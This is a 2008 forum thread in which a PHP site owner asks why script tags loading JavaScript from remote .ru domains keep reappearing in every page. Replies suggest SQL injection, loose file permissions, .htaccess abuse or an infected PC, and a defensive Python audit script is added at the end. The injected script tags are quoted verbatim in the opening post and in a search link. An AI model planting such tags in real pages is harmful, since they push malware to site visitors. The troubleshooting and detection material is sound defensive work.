
Malware scripts being added to site?

  • 19-08-2008 3:01pm
    #1
    Closed Accounts Posts: 98 ✭✭


    Hey guys,

    Over the past week or so every page on my site has been compromised and a script link has been uploaded onto the pages. They look like..

    <script src=http://www.juc8.ru/js.js></script>
    <script src=http://www.nbh3.ru/js.js></script>
    <script src=http://www.3njx.ru/js.js></script>

    How can these be embedded into the webpage without anyone having FTP access? I have shortened my input textfields and I'm using mysql_string_escape on all queries to the database. Could there be something I'm missing?


Comments

  • Closed Accounts Posts: 17,208 ✭✭✭✭aidan_walsh


    Moved from Virus and Malware Removal, might get some better responses here.


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    Ah yeah, that's grand... wasn't sure where to put it. Cheers


  • Registered Users Posts: 3,361 ✭✭✭randombar


    Are you using any external applications like phpThumb or something like that? Lots of exploits in external apps.

    Also check your file permissions, if this is happening change them to 766 (I think??)


  • Moderators, Category Moderators, Motoring & Transport Moderators Posts: 21,238 CMod ✭✭✭✭Eoin


    I came across the article below last week, which may help.

    New SQL Injection Attack Fuses Malware, Phishing


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    GaryCocs -
    I'll need to check my file permissions again. The only external application I'm using is Moxiecode's TinyMCE... but you need to be logged into the system before this app can be used.

    eoin_s -
    I'll have a look at that article now, thanks for the link.


  • Closed Accounts Posts: 1,200 ✭✭✭louie


    Did you check your database?
    The script should be there if you are running asp pages.


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    I'm running PHP. The pages that are affected, all of the HTML code is hard coded. I'm only using PHP to run login queries and that, but I can't find anything specific in the database.

    When I clean up the files it seems to be fine for a few days, then all of a sudden the scripts are inserted once again.

    I read over the article link that eoin provided and that seems to be close to what's happening on my server. Except the scripts are not being stored in the database.

    The article said "The attack apparently rewrites the server's Web pages to include JavaScript which pushes malware to the visitor as if it were from the genuine site"... how on earth they can do that is beyond me. :confused:


  • Closed Accounts Posts: 1,200 ✭✭✭louie


    I will start by changing the ftp login details.
    Check the server for any files that you don't recognise.
    Check the .htaccess file as well...


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    Just as a matter of interest, how do you actually view the htaccess log? Not too familiar with checking that stuff to be honest.

    Is it possible this attack could happen simply if a directory permission was 777, and affect every page on the site?


  • Closed Accounts Posts: 17,208 ✭✭✭✭aidan_walsh


    If you have host specific queries, please contact your host for assistance.


  • Registered Users Posts: 7,739 ✭✭✭mneylon


    One of our clients had a similar issue due to PC being infected, so I'd start checking there ...


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    I've already fully tested the machine for malware and any sort of infection and can't see any issues.

    The site is still getting compromised even if there has been no FTP access from my machine to the server since the last time I cleaned up the files removing the scripts. There must be some loophole on the server among the hundreds of files for this site to be exploited.

    I also got the IP address of the domains that were in the scripts and blocked access from them to my server, but there seem to be new domains in circulation all the time.


  • Closed Accounts Posts: 1,200 ✭✭✭louie


    Yes it does as 777=read, write & execute

    Using the .htaccess file you can force files into the header.


  • Registered Users Posts: 4,386 ✭✭✭EKRIUQ


    Have you got a stats counter for your website installed? It could be this.
    I've noticed this script seems to be targeting property rental sites.

    http://www.google.ie/search?hl=en&safe=off&q=%3Cscript+src%3Dhttp://www.juc8.ru/js.js%3E%3C/script%3E&start=0&sa=N
    src=http://www.juc8.ru/js.js></script> for rent
    free hit counter script Some other posts :

    It's great to know my virus protection is working:)

    Warning: don't click any links unless your virus protection is up to date


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    No, no hit counter script... just use Google Analytics to handle all that. :rolleyes:

    I'm gonna search through the server and remove any external/ third party applications that are not in use. See how I get on with that. I have removed all scripts from the site, but no doubt... they'll be back in a few days. :(


  • Moderators, Category Moderators, Motoring & Transport Moderators Posts: 21,238 CMod ✭✭✭✭Eoin


    Are you using the querystring to send in any values?


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    Yes but I have all queries parsed with the mysql_string_escape() and add_slashes();


  • Registered Users Posts: 215 ✭✭CapedCrusader


    eoin_s wrote: »
    I came across the article below last week, which may help.

    New SQL Injection Attack Fuses Malware, Phishing

    I've seen this attack attempted many times on my site. Is it safe to say that if I don't find references to unfamiliar JavaScript in the HTML of my site's pages, then I'm OK?

    How can you tell from the DB if this attack has been successful or not?
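
The file-side checks raised in this thread (script tags pointing at hosts you don't recognise, world-writable 777 permissions, and .htaccess directives that pull an extra file into every request) can be run in one pass over the web root. This is an added Python example, not code from any poster; `audit_webroot`, `demo`, the host allowlist and the sample tree are assumptions constructed for illustration, and it does not inspect the database.

```python
import os
import re
import stat
import tempfile
from urllib.parse import urlparse

# Quoted or unquoted src values, e.g. <script src=http://host/js.js>
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# PHP settings in .htaccess that add an extra file to every request
HTACCESS_INCLUDE = re.compile(r'^\s*php_value\s+auto_(?:prepend|append)_file\b', re.I | re.M)
PAGE_EXTS = ('.html', '.htm', '.php', '.js')

def audit_webroot(root, allowed_hosts):
    """Return sorted (relative_path, finding) tuples for everything under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = os.lstat(path).st_mode
            if mode & stat.S_IWOTH and not stat.S_ISLNK(mode):
                findings.append((rel, 'world-writable (mode %o)' % stat.S_IMODE(mode)))
            if not stat.S_ISREG(mode):
                continue
            if name == '.htaccess':
                with open(path, errors='replace') as fh:
                    if HTACCESS_INCLUDE.search(fh.read()):
                        findings.append((rel, 'htaccess forces an included file'))
            elif name.lower().endswith(PAGE_EXTS):
                with open(path, errors='replace') as fh:
                    for src in SCRIPT_SRC.findall(fh.read()):
                        host = urlparse(src).hostname  # None for relative paths
                        if host and host.lower() not in allowed_hosts:
                            findings.append((rel, 'external script from ' + host.lower()))
    return sorted(findings)

def demo():
    root = tempfile.mkdtemp()
    samples = {  # constructed sample tree, not data from the thread
        'index.html': '<script src=http://injected.example/js.js></script>',
        'about.html': '<script src="/js/site.js"></script>',
        'stats.html': '<script src="https://www.google-analytics.com/ga.js"></script>',
        '.htaccess': 'php_value auto_prepend_file /tmp/placeholder.php\n',
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), 'w') as fh:
            fh.write(body)
        os.chmod(fh.name, 0o777 if name == 'index.html' else 0o644)
    return audit_webroot(root, {'www.google-analytics.com'})
```

Run it against a clean copy of the site first so the allowlist reflects the hosts you actually load scripts from; anything it reports after that is a change worth investigating.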

